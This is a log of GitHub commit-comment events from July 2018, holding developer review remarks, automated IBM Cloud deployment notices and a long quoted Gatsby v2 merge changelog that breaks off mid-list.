{"id":"7957469175","type":"CommitCommentEvent","actor":{"login":"damiacastells"},"repo":{"name":"damiacastells/blackpier-database"},"payload":{"comment":{"id":29687964,"position":null,"line":null,"path":null,"commit_id":"09d4d72917f12f77ac6c4fcd38f75176156b25b1","created_at":"2018-07-12T16:50:46Z","updated_at":"2018-07-12T16:50:46Z","author_association":"OWNER","body":"**Welcome to Command.**\r\nHere is the code of the Command APP: Blackpier Command is the Application to Create Orders, View User Details."}},"created_at":"2018-07-12T16:50:46Z"}
{"id":"7957471336","type":"CommitCommentEvent","actor":{"login":"DataStrategist"},"repo":{"name":"DataStrategist/amitkohli.com"},"payload":{"comment":{"id":29687969,"position":31,"line":38,"path":"content/post/2018-07-07-crime-statistics-in-london.Rmd","commit_id":"7880641904bcc2d20c61dfcd0195a9edd768c4fe","created_at":"2018-07-12T16:51:13Z","updated_at":"2018-07-12T16:51:13Z","author_association":"OWNER","body":"Thanks man! That looks much better. You rule! \r\n"}},"created_at":"2018-07-12T16:51:13Z"}
{"id":"7957475025","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29687973,"position":null,"line":null,"path":null,"commit_id":"bbfd2b30784221b7ed6c3de09e3763d68a8029b7","created_at":"2018-07-12T16:51:56Z","updated_at":"2018-07-12T16:51:56Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-165154 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-165154\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:51:56Z"}
{"id":"7957481510","type":"CommitCommentEvent","actor":{"login":"qbalin"},"repo":{"name":"qbalin/test"},"payload":{"comment":{"id":29687985,"position":7,"line":12,"path":"public/index.html","commit_id":"83849c793eeafcaaff59b94954b4a305b7cf5e53","created_at":"2018-07-12T16:53:12Z","updated_at":"2018-07-12T16:53:12Z","author_association":"OWNER","body":"Add these four lines at this location, this will allow you to use bootstrap. @hsako "}},"created_at":"2018-07-12T16:53:12Z"}
{"id":"7957482164","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29687987,"position":31,"line":471,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T16:53:21Z","updated_at":"2018-07-12T16:53:21Z","author_association":"CONTRIBUTOR","body":"\"Could not save to **source**: %1$s. Save again or use the Synchronize menu when **source** connection is available again.\"\r\nprobably even better \"[...] Save again or use the Synchronize menu when **original file** is available again.\""}},"created_at":"2018-07-12T16:53:21Z"}
{"id":"7957482709","type":"CommitCommentEvent","actor":{"login":"talweiss1982"},"repo":{"name":"ravendb/jint"},"payload":{"comment":{"id":29687988,"position":13,"line":68,"path":"Jint/Runtime/JavaScriptException.cs","commit_id":"b9c5028911e853c9eb23140ee65d82fc873c24d8","created_at":"2018-07-12T16:53:27Z","updated_at":"2018-07-12T16:53:27Z","author_association":"MEMBER","body":"I have probably modified the stack trace string, not sure if emca covers how the stack should look like but all I did is to add the first statement where an except is thrown. This was needed to properly display the place where a script is failing. "}},"created_at":"2018-07-12T16:53:27Z"}
{"id":"7957485733","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687995,"position":null,"line":null,"path":null,"commit_id":"62c844f4839e3bae0afea4d3fc6e9ffb4e937814","created_at":"2018-07-12T16:54:01Z","updated_at":"2018-07-12T16:54:01Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-165400 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-165400\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:54:01Z"}
{"id":"7957486198","type":"CommitCommentEvent","actor":{"login":"qbalin"},"repo":{"name":"qbalin/test"},"payload":{"comment":{"id":29687998,"position":13,"line":21,"path":"app/components/root.js","commit_id":"83849c793eeafcaaff59b94954b4a305b7cf5e53","created_at":"2018-07-12T16:54:07Z","updated_at":"2018-07-12T16:54:07Z","author_association":"OWNER","body":"This comes from the doc: https://getbootstrap.com/docs/4.1/components/alerts/#examples"}},"created_at":"2018-07-12T16:54:07Z"}
{"id":"7957488385","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29688002,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T16:54:33Z","updated_at":"2018-07-12T16:54:33Z","author_association":"MEMBER","body":"All of those look good to me except the escape character which I am unsure.\nDo you have an example?\n-- \n\n\n*José Valimwww.plataformatec.com.br\n<http://www.plataformatec.com.br/>Founder and Director of R&D*\n"}},"created_at":"2018-07-12T16:54:33Z"}
{"id":"7957488951","type":"CommitCommentEvent","actor":{"login":"jameshadfield"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29688006,"position":null,"line":null,"path":null,"commit_id":"42ce908c018f47a4e08694f3c34fa5c54dec97e5","created_at":"2018-07-12T16:54:39Z","updated_at":"2018-07-12T16:54:39Z","author_association":"MEMBER","body":"Hey @trvrb - these all look good, but why are we trying to support python3 for prepare/process when we are deprecating it? Is it to simplify the install requirements for the repo?"}},"created_at":"2018-07-12T16:54:39Z"}
{"id":"7957489365","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"phusion/digest-sha3-ruby"},"payload":{"comment":{"id":29688007,"position":5,"line":5,"path":"ext/digest/sha3.c","commit_id":"f7b055100c1e97b47be71193e528729e59f4017d","created_at":"2018-07-12T16:54:45Z","updated_at":"2018-07-12T16:54:45Z","author_association":"NONE","body":"Did you mean to include `digest.h` in this commit, but forgot to add it?\r\nOtherwise I guess `ruby/digest.h` is effectively required and there seems to be no point to check with `#ifdef`."}},"created_at":"2018-07-12T16:54:45Z"}
{"id":"7957495944","type":"CommitCommentEvent","actor":{"login":"shannonbux"},"repo":{"name":"afrastgeek/gatsbygram"},"payload":{"comment":{"id":29688014,"position":null,"line":null,"path":null,"commit_id":"0905cc5f4fd57794d3316808f39ed87eb9bfa0c4","created_at":"2018-07-12T16:55:57Z","updated_at":"2018-07-12T16:55:57Z","author_association":"NONE","body":"wow sure is a lot of squashed commits! My only question: once this gets\nmerged, what changes to the workflow should contributors know about? (see\nthe template that appears when creating a PR. Do we need to edit that\n@m-allanson?)\n\nOn Thu, Jul 12, 2018 at 5:00 AM, Kyle Mathews <notifications@github.com>\nwrote:\n\n> Merge v2 in master making it the default branch (#5954)\n>\n> * Publish\n>\n>  - gatsby-plugin-manifest@2.0.1-7\n>\n> * fix icon link\n>\n> * Publish\n>\n>  - gatsby-plugin-manifest@2.0.1-8\n>\n> * [v2] Update offline plugin so it doesn't cachebust JS files any more as\n> well as anything in the static directory (#5299)\n>\n> * Publish\n>\n>  - gatsby-plugin-offline@2.0.0-alpha.8\n>\n> * fix lint (#5304)\n>\n> * [v2] Allow for plugins to override core prefetching behavior (#5320)\n>\n> * Always fetch page resources if user mouseenters a link\n>\n> * Allow plugins to stop core prefetching\n>\n> * Misc small fixes\n>\n> * When rendering bundle for generating HTML, target the current node\n> version\n>\n> * Sort matchPath pages last so more explicit matches win\n>\n> * Misc\n>\n> * Revert\n>\n> * Remove stray console.log\n>\n> * Publish\n>\n>  - gatsby-link@1.6.38-6\n>  - gatsby-plugin-manifest@2.0.1-9\n>  - gatsby@2.0.0-alpha.29\n>\n> * Expose dataPaths on window for access by plugins (need to create API)\n> (#5322)\n>\n> * Publish\n>\n>  - gatsby@2.0.0-alpha.30\n>\n> * [v2][tut. part 7] Rename boundActionCreators to actions (#5293)\n>\n> * [v2][tut. part 4] typography peerDependencies (#5292)\n>\n> * Remove this for now, as it's not currently being used (#5325)\n>\n> * [v2] re-add tests for sass and less plugins + update using-sass example\n> (#5223)\n>\n> * update \"using-sass\" example\n>\n> * [gatsby-plugin-sass] add tests\n>\n> * [gatsby-plugin-less] update tests and README\n>\n> * commit missing file\n>\n> * add missing snapshot\n>\n> * [v2] sourceType: 'unambigious' is a general babel config option, not for\n> @babel/preset-env (#5336)\n>\n> * [v2] sourceType: 'unambigious' is a general babel config option, not for\n> @babel/preset-env\n>\n> * Update snapshots\n>\n> * Publish\n>\n>  - gatsby-plugin-less@2.0.0-alpha.9\n>  - gatsby-plugin-sass@2.0.0-alpha.9\n>  - gatsby@2.0.0-alpha.31\n>\n> * Adding deploy steps for Aerobatic (#4437)\n>\n> * [v2] small refactor of api-runner-browser to fix loader test (#5343)\n>\n> * small refactor of api-runner-browser to fix tests\n>\n> * remove stray '$' and unneeded eslint-disable-next-line\n>\n> * fix sass and less variants of css modules in build-html stage (#5340)\n>\n> * [v2] fix gatsbygram build (#5356)\n>\n> * Publish\n>\n>  - gatsby-plugin-less@2.0.0-alpha.10\n>  - gatsby-plugin-sass@2.0.0-alpha.10\n>  - gatsby@2.0.0-alpha.32\n>\n> * [v2] deleteNode signature (#5222)\n>\n> * Change deleteNode signature to remove nodeId\n>\n> * These tests were failing?\n>\n> * Deprecate old deleteNode method signature\n>\n> * Change touchNode to accept an object\n>\n> * [v2] Initial commit of gatsby-plugin-guess-js & gatsby-source-wikipedia\n> (#5358)\n>\n> * Add gatsby-source-wikipedia\n>\n> * Add gatsby-plugin-guess-js\n>\n> * Only run guess code during builds as can error during development\n>\n> * Set packages to alpha\n>\n> * Add more keywords to gatsby-source-wikipedia\n>\n> * Document plugins\n>\n> * Publish\n>\n>  - gatsby-plugin-guess-js@1.0.0-alpha.2\n>  - gatsby-source-contentful@2.0.0-alpha.11\n>  - gatsby-source-drupal@2.1.0-alpha.10\n>  - gatsby-source-filesystem@2.0.0-alpha.9\n>  - gatsby-source-lever@1.0.9-6\n>  - gatsby-source-wikipedia@1.0.0-alpha.2\n>  - gatsby-source-wordpress@2.0.57-8\n>  - gatsby-transformer-screenshot@1.0.3-6\n>  - gatsby@2.0.0-alpha.33\n>\n> * Run bootstrap\n>\n> * [gatsby-plugin-guess-js] fix a small README (#5361)\n>\n> * Publish\n>\n>  - gatsby-plugin-guess-js@1.0.0-alpha.3\n>\n> * Fix www front page + small edits to tutorial\n>\n> * Add start to part-8\n>\n> * only look for files when looking for depracated APIs (#5374)\n>\n> `glob.sync` returns files and directories by default.\n> It is not forbidden to name a directory `foo.js` and it would be returned\n> by `glob`.\n> That's an issue because `fs.readFileSync(file)` will then fail with\n> `EISDIR: illegal operation on a directory`.\n>\n> This makes sure that `glob.sync` only returns files\n>\n> * Lint (#5363)\n>\n> * Fix the gatsbygram UI tests (#5362)\n>\n> * Fix typo\n>\n> * [v2] Make default browserslist more futureproof (#5114)\n>\n> * [v2] Make default browserslist more futureproof\n>\n> This is inspired by Jamie Kyle's blog post/issue in babel yesterday\n> on the problems of using \"last 2 versions\" with @babel/preset-env which\n> includes browsers which aren't receiving updates anymore so \"last 2\n> versions\" will always be building for them.\n>\n> To quote his post:\n>\n> >Using market share percentages as your baseline is much better than some\n> arbitrary number of previous versions. If a browser is used by 0 people,\n> then market percentages will reflect that.\n>\n> * https://jamie.build/last-2-versions\n> * https://github.com/babel/babel/issues/7789\n>\n> * Use recommended browser defaults\n>\n> * Update index.md\n>\n> Fixing Layout closing tag\n>\n> * Update index.md (#5383)\n>\n> Fixing rhythm export\n>\n> * [v2] Pin babel (#5389)\n>\n> * Pin babel version\n>\n> * Update yarn.lock\n>\n> * remove deprecated Tapable.plugin syntax (#5395)\n>\n> * [V2] Docs - Import Link from gatsby. (#5390)\n>\n> * pass pathContext to page component - it's deprecated, not removed (#5387)\n>\n> * Use \"you\" instead of \"we\" where appropriate (#5418)\n>\n> https://github.com/gatsbyjs/gatsby/issues/5381\n>\n> * [v2] Update Babel to 7.0.0-beta.47 (#5399)\n>\n> * Update babel to 7.0.0-beta.46\n>\n> * Update yarn.lock\n>\n> * Fix ignore paths\n>\n> * Add missing .babelrc files\n>\n> * Add config for Gatsby package\n>\n> * Fix Jest source compilation\n>\n> * Update to beta 47\n>\n> * Update yarn.lock\n>\n> * Remove unused dependencies (#5401)\n>\n> * [v2][tut. part 1] Use \"you\" instead of \"we\" where appropriate (#5420)\n>\n> * [v2][tut. part 2] Use \"you\" instead of \"we\" where appropriate (#5421)\n>\n> * [v2][tut. part 3] Use \"you\" instead of \"we\" where appropriate (#5422)\n>\n> * [v2] Update ESLint-related dependencies (#5419)\n>\n> * Update ESLint-related dependencies\n>\n> Fixes #5411\n>\n> * Remove duplicate dependency from gatsby/package.json\n>\n> * [v2][tut. part 4] Use \"you\" instead of \"we\" where appropriate (#5428)\n>\n> * [v2][tut. part 5] Use \"you\" instead of \"we\" where appropriate (#5429)\n>\n> * [v2][tut. part 6] Use \"you\" instead of \"we\" where appropriate (#5430)\n>\n> * [v2][tut. part 8] Use \"you\" instead of \"we\" where appropriate (#5431)\n>\n> * [v2][tut. part 1] Bracket consistency (#5432)\n>\n> * [v2][tut. part 2] Bracket consistency on code blocks + fix line number\n> highlights (#5433)\n>\n> * [gatsby-plugin-sharp] tests: mock async/queue to not actually run sharp\n> sizing (#5426)\n>\n> * Use pageContext\n>\n> * Publish\n>\n>  - babel-plugin-remove-graphql-queries@2.0.1-5\n>  - gatsby-1-config-css-modules@1.0.10-7\n>  - gatsby-cli@1.1.41-5\n>  - gatsby-dev-cli@1.2.12-4\n>  - gatsby-image@1.0.42-5\n>  - gatsby-link@1.6.38-7\n>  - gatsby-plugin-canonical-urls@1.0.14-6\n>  - gatsby-plugin-catch-links@2.0.1-6\n>  - gatsby-plugin-coffeescript@2.0.0-alpha.9\n>  - gatsby-plugin-create-client-paths@1.0.6-5\n>  - gatsby-plugin-emotion@2.0.0-alpha.6\n>  - gatsby-plugin-facebook-analytics@1.0.4-3\n>  - gatsby-plugin-feed@1.3.19-6\n>  - gatsby-plugin-fullstory@1.0.4-3\n>  - gatsby-plugin-glamor@2.0.0-alpha.9\n>  - gatsby-plugin-google-analytics@1.0.20-6\n>  - gatsby-plugin-google-tagmanager@1.0.15-6\n>  - gatsby-plugin-guess-js@1.0.0-alpha.4\n>  - gatsby-plugin-jss@2.0.1-6\n>  - gatsby-plugin-less@2.0.0-alpha.11\n>  - gatsby-plugin-lodash@3.0.0-alpha.8\n>  - gatsby-plugin-manifest@2.0.1-10\n>  - gatsby-plugin-netlify-cms@1.0.8-7\n>  - gatsby-plugin-netlify@1.0.19-7\n>  - gatsby-plugin-nprogress@2.0.0-alpha.8\n>  - gatsby-plugin-offline@2.0.0-alpha.9\n>  - gatsby-plugin-preact@2.0.1-7\n>  - gatsby-plugin-react-css-modules@2.0.0-alpha.8\n>  - gatsby-plugin-react-helmet@2.0.12-3\n>  - gatsby-plugin-react-next@2.0.1-7\n>  - gatsby-plugin-remove-trailing-slashes@1.0.6-5\n>  - gatsby-plugin-sass@2.0.0-alpha.11\n>  - gatsby-plugin-sharp@2.0.0-alpha.13\n>  - gatsby-plugin-sitemap@1.2.14-5\n>  - gatsby-plugin-styled-components@3.0.0-alpha.3\n>  - gatsby-plugin-styled-jsx@3.0.0-alpha.6\n>  - gatsby-plugin-styletron@1.0.13-6\n>  - gatsby-plugin-stylus@1.1.16-7\n>  - gatsby-plugin-twitter@1.0.18-6\n>  - gatsby-plugin-typescript@1.4.17-7\n>  - gatsby-plugin-typography@2.0.1-7\n>  - gatsby-react-router-scroll@1.0.12-5\n>  - gatsby-remark-autolink-headers@1.4.13-6\n>  - gatsby-remark-code-repls@1.0.10-5\n>  - gatsby-remark-copy-linked-files@1.5.28-6\n>  - gatsby-remark-custom-blocks@1.0.4-7\n>  - gatsby-remark-embed-snippet@1.0.10-7\n>  - gatsby-remark-images@2.0.0-alpha.14\n>  - gatsby-remark-katex@1.0.13-5\n>  - gatsby-remark-prismjs@1.2.16-6\n>  - gatsby-remark-responsive-iframe@1.4.18-6\n>  - gatsby-remark-smartypants@1.4.12-7\n>  - gatsby-source-contentful@2.0.0-alpha.12\n>  - gatsby-source-drupal@2.1.0-alpha.11\n>  - gatsby-source-faker@1.0.3-6\n>  - gatsby-source-filesystem@2.0.0-alpha.10\n>  - gatsby-source-hacker-news@1.0.11-6\n>  - gatsby-source-lever@1.0.9-7\n>  - gatsby-source-medium@1.0.13-6\n>  - gatsby-source-mongodb@1.5.16-6\n>  - gatsby-source-npm-package-search@1.0.9-2\n>  - gatsby-source-wikipedia@1.0.0-alpha.3\n>  - gatsby-source-wordpress@2.0.57-9\n>  - gatsby-transformer-csv@1.3.9-6\n>  - gatsby-transformer-documentationjs@1.4.10-6\n>  - gatsby-transformer-excel@2.0.1-6\n>  - gatsby-transformer-hjson@2.0.1-6\n>  - gatsby-transformer-javascript-frontmatter@1.0.6-5\n>  - gatsby-transformer-javascript-static-exports@2.0.1-6\n>  - gatsby-transformer-json@2.0.1-6\n>  - gatsby-transformer-pdfimages@1.0.6-4\n>  - gatsby-transformer-react-docgen@2.0.1-7\n>  - gatsby-transformer-remark@2.0.1-8\n>  - gatsby-transformer-sharp@2.0.1-6\n>  - gatsby-transformer-toml@2.0.1-6\n>  - gatsby-transformer-xml@1.0.16-3\n>  - gatsby-transformer-yaml@2.0.1-6\n>  - gatsby@2.0.0-alpha.34\n>  - graphql-skip-limit@2.0.0-alpha.3\n>\n> * Publish\n>\n>  - babel-plugin-remove-graphql-queries@2.0.1-6\n>  - gatsby-1-config-css-modules@1.0.10-8\n>  - gatsby-1-config-extract-plugin@1.0.4-3\n>  - gatsby-cli@1.1.41-6\n>  - gatsby-dev-cli@1.2.12-5\n>  - gatsby-image@1.0.42-6\n>  - gatsby-link@1.6.38-8\n>  - gatsby-plugin-canonical-urls@1.0.14-7\n>  - gatsby-plugin-catch-links@2.0.1-7\n>  - gatsby-plugin-coffeescript@2.0.0-alpha.10\n>  - gatsby-plugin-create-client-paths@1.0.6-6\n>  - gatsby-plugin-emotion@2.0.0-alpha.7\n>  - gatsby-plugin-facebook-analytics@1.0.4-4\n>  - gatsby-plugin-feed@1.3.19-7\n>  - gatsby-plugin-fullstory@1.0.4-4\n>  - gatsby-plugin-glamor@2.0.0-alpha.10\n>  - gatsby-plugin-google-analytics@1.0.20-7\n>  - gatsby-plugin-google-tagmanager@1.0.15-7\n>  - gatsby-plugin-guess-js@1.0.0-alpha.5\n>  - gatsby-plugin-jss@2.0.1-7\n>  - gatsby-plugin-less@2.0.0-alpha.12\n>  - gatsby-plugin-lodash@3.0.0-alpha.9\n>  - gatsby-plugin-manifest@2.0.1-11\n>  - gatsby-plugin-netlify-cms@1.0.8-8\n>  - gatsby-plugin-netlify@1.0.19-8\n>  - gatsby-plugin-nprogress@2.0.0-alpha.9\n>  - gatsby-plugin-offline@2.0.0-alpha.10\n>  - gatsby-plugin-preact@2.0.1-8\n>  - gatsby-plugin-react-css-modules@2.0.0-alpha.9\n>  - gatsby-plugin-react-helmet@2.0.12-4\n>  - gatsby-plugin-react-next@2.0.1-8\n>  - gatsby-plugin-remove-trailing-slashes@1.0.6-6\n>  - gatsby-plugin-sass@2.0.0-alpha.12\n>  - gatsby-plugin-sharp@2.0.0-alpha.14\n>  - gatsby-plugin-sitemap@1.2.14-6\n>  - gatsby-plugin-styled-components@3.0.0-alpha.4\n>  - gatsby-plugin-styled-jsx@3.0.0-alpha.7\n>  - gatsby-plugin-styletron@1.0.13-7\n>  - gatsby-plugin-stylus@1.1.16-8\n>  - gatsby-plugin-twitter@1.0.18-7\n>  - gatsby-plugin-typescript@1.4.17-8\n>  - gatsby-plugin-typography@2.0.1-8\n>  - gatsby-react-router-scroll@1.0.12-6\n>  - gatsby-remark-autolink-headers@1.4.13-7\n>  - gatsby-remark-code-repls@1.0.10-6\n>  - gatsby-remark-copy-linked-files@1.5.28-7\n>  - gatsby-remark-custom-blocks@1.0.4-8\n>  - gatsby-remark-embed-snippet@1.0.10-8\n>  - gatsby-remark-images@2.0.0-alpha.15\n>  - gatsby-remark-katex@1.0.13-6\n>  - gatsby-remark-prismjs@1.2.16-7\n>  - gatsby-remark-responsive-iframe@1.4.18-7\n>  - gatsby-remark-smartypants@1.4.12-8\n>  - gatsby-source-contentful@2.0.0-alpha.13\n>  - gatsby-source-drupal@2.1.0-alpha.12\n>  - gatsby-source-faker@1.0.3-7\n>  - gatsby-source-filesystem@2.0.0-alpha.11\n>  - gatsby-source-hacker-news@1.0.11-7\n>  - gatsby-source-lever@1.0.9-8\n>  - gatsby-source-medium@1.0.13-7\n>  - gatsby-source-mongodb@1.5.16-7\n>  - gatsby-source-npm-package-search@1.0.9-3\n>  - gatsby-source-wikipedia@1.0.0-alpha.4\n>  - gatsby-source-wordpress@2.0.57-10\n>  - gatsby-transformer-csv@1.3.9-7\n>  - gatsby-transformer-documentationjs@1.4.10-7\n>  - gatsby-transformer-excel@2.0.1-7\n>  - gatsby-transformer-hjson@2.0.1-7\n>  - gatsby-transformer-javascript-frontmatter@1.0.6-6\n>  - gatsby-transformer-javascript-static-exports@2.0.1-7\n>  - gatsby-transformer-json@2.0.1-7\n>  - gatsby-transformer-pdfimages@1.0.6-5\n>  - gatsby-transformer-react-docgen@2.0.1-8\n>  - gatsby-transformer-remark@2.0.1-9\n>  - gatsby-transformer-screenshot@1.0.3-7\n>  - gatsby-transformer-sharp@2.0.1-7\n>  - gatsby-transformer-toml@2.0.1-7\n>  - gatsby-transformer-xml@1.0.16-4\n>  - gatsby-transformer-yaml@2.0.1-7\n>  - gatsby@2.0.0-alpha.35\n>  - graphql-skip-limit@2.0.0-alpha.4\n>\n> * Publish\n>\n>  - babel-plugin-remove-graphql-queries@2.0.1-7\n>  - gatsby-1-config-css-modules@1.0.10-9\n>  - gatsby-1-config-extract-plugin@1.0.4-4\n>  - gatsby-cli@1.1.41-7\n>  - gatsby-dev-cli@1.2.12-6\n>  - gatsby-image@1.0.42-7\n>  - gatsby-link@1.6.38-9\n>  - gatsby-plugin-canonical-urls@1.0.14-8\n>  - gatsby-plugin-catch-links@2.0.1-8\n>  - gatsby-plugin-coffeescript@2.0.0-alpha.11\n>  - gatsby-plugin-create-client-paths@1.0.6-7\n>  - gatsby-plugin-emotion@2.0.0-alpha.8\n>  - gatsby-plugin-facebook-analytics@1.0.4-5\n>  - gatsby-plugin-feed@1.3.19-8\n>  - gatsby-plugin-fullstory@1.0.4-5\n>  - gatsby-plugin-glamor@2.0.0-alpha.11\n>  - gatsby-plugin-google-analytics@1.0.20-8\n>  - gatsby-plugin-google-tagmanager@1.0.15-8\n>  - gatsby-plugin-guess-js@1.0.0-alpha.6\n>  - gatsby-plugin-jss@2.0.1-8\n>  - gatsby-plugin-less@2.0.0-alpha.13\n>  - gatsby-plugin-lodash@3.0.0-alpha.10\n>  - gatsby-plugin-manifest@2.0.1-12\n>  - gatsby-plugin-netlify-cms@1.0.8-9\n>  - gatsby-plugin-netlify@1.0.19-9\n>  - gatsby-plugin-nprogress@2.0.0-alpha.10\n>  - gatsby-plugin-offline@2.0.0-alpha.11\n>  - gatsby-plugin-preact@2.0.1-9\n>  - gatsby-plugin-react-css-modules@2.0.0-alpha.10\n>  - gatsby-plugin-react-helmet@2.0.12-5\n>  - gatsby-plugin-react-next@2.0.1-9\n>  - gatsby-plugin-remove-trailing-slashes@1.0.6-7\n>  - gatsby-plugin-sass@2.0.0-alpha.13\n>  - gatsby-plugin-sharp@2.0.0-alpha.15\n>  - gatsby-plugin-sitemap@1.2.14-7\n>  - gatsby-plugin-styled-components@3.0.0-alpha.5\n>  - gatsby-plugin-styled-jsx@3.0.0-alpha.8\n>  - gatsby-plugin-styletron@1.0.13-8\n>  - gatsby-plugin-stylus@1.1.16-9\n>  - gatsby-plugin-twitter@1.0.18-8\n>  - gatsby-plugin-typescript@1.4.17-9\n>  - gatsby-plugin-typography@2.0.1-9\n>  - gatsby-react-router-scroll@1.0.12-7\n>  - gatsby-remark-autolink-headers@1.4.13-8\n>  - gatsby-remark-code-repls@1.0.10-7\n>  - gatsby-remark-copy-linked-files@1.5.28-8\n>  - gatsby-remark-custom-blocks@1.0.4-9\n>  - gatsby-remark-embed-snippet@1.0.10-9\n>  - gatsby-remark-images@2.0.0-alpha.16\n>  - gatsby-remark-katex@1.0.13-7\n>  - gatsby-remark-prismjs@1.2.16-8\n>  - gatsby-remark-responsive-iframe@1.4.18-8\n>  - gatsby-remark-smartypants@1.4.12-9\n>  - gatsby-source-contentful@2.0.0-alpha.14\n>  - gatsby-source-drupal@2.1.0-alpha.13\n>  - gatsby-source-faker@1.0.3-8\n>  - gatsby-source-filesystem@2.0.0-alpha.12\n>  - gatsby-source-hacker-news@1.0.11-8\n>  - gatsby-source-lever@1.0.9-9\n>  - gatsby-source-medium@1.0.13-8\n>  - gatsby-source-mongodb@1.5.16-8\n>  - gatsby-source-npm-package-search@1.0.9-4\n>  - gatsby-source-wikipedia@1.0.0-alpha.5\n>  - gatsby-source-wordpress@2.0.57-11\n>  - gatsby-transformer-csv@1.3.9-8\n>  - gatsby-transformer-documentationjs@1.4.10-8\n>  - gatsby-transformer-excel@2.0.1-8\n>  - gatsby-transformer-hjson@2.0.1-8\n>  - gatsby-transformer-javascript-frontmatter@1.0.6-7\n>  - gatsby-transformer-javascript-static-exports@2.0.1-8\n>  - gatsby-transformer-json@2.0.1-8\n>  - gatsby-transformer-pdfimages@1.0.6-6\n>  - gatsby-transformer-react-docgen@2.0.1-9\n>  - gatsby-transformer-remark@2.0.1-10\n>  - gatsby-transformer-screenshot@1.0.3-8\n>  - gatsby-transformer-sharp@2.0.1-8\n>  - gatsby-transformer-toml@2.0.1-8\n>  - gatsby-transformer-xml@1.0.16-5\n>  - gatsby-transformer-yaml@2.0.1-8\n>  - gatsby@2.0.0-alpha.36\n>  - graphql-skip-limit@2.0.0-alpha.5\n>\n> * Add missing dev dependencies\n>\n> * [v2][tut. part 3] Bracket consistency on code blocks (#5434)\n>\n> * [v2][tut. part 4] Bracket consistency on code blocks (#5435)\n>\n> * Publish\n>\n>  - gatsby-remark-katex@1.0.13-8\n>\n> * Bump version of Gatsby for new build\n>\n> * Publish\n>\n>  - gatsby@2.0.0-alpha.38\n>\n> * [gatsby-remark-images] change gatsby-plugin-sharp version to next to\n> avoid resolving version to outdated canary release (#5443)\n>\n> * Publish\n>\n>  - gatsby-remark-images@2.0.0-alpha.17\n>\n> * [v2][www] Add global layout to pages and templates that don’t have it\n> yet. (#5454)\n>\n> * Added missing package\n>\n> * Added global layout + fix little issues\n>\n> * [v2][tut. pt. 4] No semi (#5449)\n>\n> * [v2][tut. pt. 2] Single to backticks consistency (#5450)\n>\n> * Run bootstrap (#5456)\n>\n> * [v2] merge master into v2 (#5451)\n>\n> * Use index within container\n>\n> Confusing as to what is being asked. Later, the docs say to `import\n> Container from \"../components/container\";`\n>\n> * Pass through GTM environment params if present\n>\n> Signed-off-by: Spencer Sanchez <dev@spencersanchez.com>\n>\n> * Add abinavseelan.com to Showcase\n>\n> * Add Dovetail (dovetailapp.com) to website examples\n>\n> Thanks for creating Gatsby and for all of your hard work! We’ve enjoyed\n> building our new marketing website with it.\n>\n> * change link of `gatsby-advanced-blog` in docs\n>\n> * Remove outdated contributing notes from gatsby-remark-prismjs\n>\n> * Typo: Return to wrong file\n>\n> I was doing the gatsby.js tutorial and I was running into one issue, the\n> tutorial said to return to index.js, but it should be to my-files.js, I\n> eventually figured out that this was probably just a typo, but for a long\n> time I kept changing my index.js file and didn't understand what I was\n> doing wrong, turns out I was editing the wrong file. For so far I have\n> enjoyed gatsby.js, I want to use it for my personal portfolio.\n>\n> * Fix distance between masthead and the icon (#5068)\n>\n> On mobile, the masthead is overlapping with the Gatsby icon.\n>\n> * Update CONTRIBUTING.md\n>\n> * Update README.md\n>\n> Per issue https://github.com/gatsbyjs/gatsby/issues/5073\n>\n> * Add better-queue to dependencies\n>\n> * Remove index.js for more consistent paths\n>\n> * removing \"a\"\n>\n> * pre-inferring data sanitazation (#5050)\n>\n> * extractFieldExamples: omit not defined fields\n>\n> this is especially helpful with ___NODE fields - plugins/users don't have\n> to test if there are any values and be confident that empty ___NODE values\n> or arrays will just be omitted and not error out during bootstrap\n>\n> * sanitize field owner key when using createNodeField with name containing\n> ___NODE\n>\n> this fixes issue with inferring fieldOwners types - gatsby would try to\n> link to not existing nodes\n>\n> * Add getRenderer method (#5017)\n>\n> * Add getRenderer method\n>\n> 